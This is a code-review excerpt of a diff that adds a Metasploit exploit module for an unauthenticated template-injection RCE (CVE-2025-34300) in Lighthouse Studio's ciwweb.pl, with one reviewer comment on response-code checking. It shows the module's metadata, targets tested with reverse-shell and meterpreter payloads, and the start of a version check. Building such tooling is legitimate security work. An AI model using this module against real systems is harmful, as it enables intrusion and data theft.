modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb

```diff
@@ -0,0 +1,144 @@
+        'Description' => %q{
+          This module exploits a template injection vulnerability in the
+          Sawtooth Software Lighthouse Studio's `ciwweb.pl` web application.
+          The application fails to properly sanitize user input within survey templates,
+          allowing unauthenticated attackers to inject and execute arbitrary Perl commands
+          on the target system.
+
+          This vulnerability affects Lighthouse Studio versions prior to 9.16.14.
+          Successful exploitation may result in remote code execution under the privileges
+          of the web server, potentially exposing sensitive data or disrupting survey operations.
+
+          An attacker can execute arbitrary system commands in the context of the user running the web server.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Maksim Rogov', # Metasploit Module
+          'Adam Kues' # Vulnerability Discovery
+        ],
+        'References' => [
+          ['CVE', '2025-34300'],
+          ['URL', 'https://slcyber.io/assetnote-security-research-center/rce-in-the-most-popular-survey-software-youve-never-heard-of/']
+        ],
+        'Platform' => ['multi'],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd
+              # Tested with cmd/unix/reverse_bash
+              # Tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => ['windows'],
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'FETCH_WRITABLE_DIR' => 'C:\\\\Windows\\\\Tasks\\\\'
+              }
+              # Tested with cmd/windows/http/x64/meterpreter/reverse_tcp
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2025-07-16',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Path to vulnerable ciwweb.pl', '/cgi-bin/ciwweb.pl']),
+        OptString.new('STUDYNAME', [false, 'Value for the hid_studyname GET parameter', '']),
+      ]
+    )
+  end
+
+  def check
+    print_status('Extracting version...')
+
+    vars = {
+      'hid_javascript' => '1'
+    }
+    vars['hid_studyname'] = datastore['STUDYNAME'] unless datastore['STUDYNAME'].strip.empty?
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET',
+      'vars_get' => vars
+    )
+    return CheckCode::Unknown('No response from target') unless res
```

Comment:
Could we also check the res code here? e.g.
```
... unless res&.code == 200
```
or whatever HTTP code makes sense here.